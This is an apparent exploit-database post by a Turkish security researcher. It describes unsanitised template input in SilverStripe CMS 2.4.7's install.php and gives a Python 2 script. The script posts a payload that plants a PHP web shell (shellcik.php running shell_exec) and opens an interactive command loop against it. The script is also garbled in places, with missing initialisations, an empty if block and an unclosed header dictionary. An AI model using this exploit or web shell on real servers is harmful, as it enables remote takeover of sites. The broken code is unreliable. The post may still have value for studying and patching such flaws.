# Exploit Title: SilverStripe CMS 2.4.7 (install.php) Remote Command Execution Exploit
# Date: 26 Nisan 2012
# Author: Mehmet INCE
# Twitter: https://twitter.com/#!/mmetince
# Company: Bilgi Güvenliği Akademisi ( www.bga.com.tr )
# Software Link: http://www.silverstripe.org/assets/downloads/SilverStripe-v2.4.7.tar.gz
# Version: 2.4.7
# Tested on: v2.4.7 with Ubuntu 11.10
# CVE : Could someone can help me about that.
# First look at install.php on 978 - 993 lines.
#	if(file_exists('mysite/_config.php')) {
#		// Truncate the contents of _config instead of deleting it - we can't re-create it because Windows handles permissions slightly
#		// differently to UNIX based filesystems - it takes the permissions from the parent directory instead of retaining them
#		$fh = fopen('mysite/_config.php', 'wb');
#		fclose($fh);
#	}
#	$theme = isset($_POST['template']) ? $_POST['template'] : 'blackcandy';
#	$locale = isset($_POST['locale']) ? $_POST['locale'] : 'en_US';
#	$type = $config['db']['type'];
#	$dbConfig = $config['db'][$type];
#	if(!$dbConfig) {
#		echo "<p style=\"color: red\">Bad config submitted</p><pre>";
#		print_r($config);
#		echo "</pre>";
#		die();
#	}
# Getting data from user with $_POST['template'] that variable. After that goo 1000. line check that.
#	$this->writeToFile("mysite/_config.php", <<<PHP
#  There is starting of write _config.php file. and our $_POST['template'] used to write thata without sanitized.
#  So we can put whatever we want to _config.php file. A few little trick i exploit that vulnerabilities
#  with that python codes. 
#  Have a nice days.
#  Gecmis 23 Nisanimiz kutlu olsun.
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import httplib, urllib, urllib2,sys, getopt

def Menu():
	print "\n\n-------------------------------------------------------"
	print "-Kullanim Klavuzu [ USAGE ]               "
	print "-------------------------------------------------------"
	print "- Temel Kullanim - I [ Default Usage ] :					 "
	print "- 		python exo.py www.target.com /            \n"
	print "- Temel Kullanim - II [ Default Usage ] :				 "
	print "- 		python exo.py www.target.com /path/          \n"
if (len(sys.argv) <= 2) or (len(sys.argv) > 3):
host = sys.argv[1]
path = sys.argv[2]

print " [+] Exploit ediliyor..!"
payload+='"../shellcik.php","w"), '
payload+="'<?php $gelen"
payload+='=@$_GET["gelen"]; echo shell_exec($gelen);?>'
parametreler = urllib.urlencode({'db[type]':'MySQLDatabase',
'go':'Installing SilverStripe...'})
print " [+]Parametreler olusturuldu [ Params Generated For Http Request ]"
basliklar = {"Content-type": "application/x-www-form-urlencoded",
			 "Accept": "text/plain",
			 "User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0",
			 "Accept-Encoding":"gzip, deflate",
			 "Referer":"http://" + host + path+"install.php",
			 "Cookie":"alc_enc=1%3Aa9dbf14198a8f6bd9dd2d2c3e41e7164fb206d76; PastMember=1; PHPSESSID=0d7k4e661jd96i0u64vij68am3; phpbb3_srzvs_k=; phpbb3_srzvs_u=2; phpbb3_srzvs_sid=ede0a17fc1f375d6a633f291119c92d7; style_cookie=null; PHPSESSID=j7nr6uro3jc5tulodfeoum3u90; fws_cust=mince%232%23d41d8cd98f00b204e9800998ecf8427e"
print " [+]Basliklar olusturuldu [ Headers Generated For Http Request ]"
conn = httplib.HTTPConnection("localhost:80")
conn.request("POST",str(path) +"install.php",parametreler,basliklar)
responce = conn.getresponse()
if responce.status != 200:
	print "[+]Http Hatası : " + responce.status + "\n"
	print "Cant Exploit!:("
if responce.status == 200:
	while( komut != "exit" ):
		komut = urllib.quote_plus(str(raw_input("Shell :) => ")))
		print urllib2.urlopen("http://" + host + path+"shellcik.php?gelen="+komut).read()

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SilverStripe CMS 2.4.7 (install.php) Remote Command Execution
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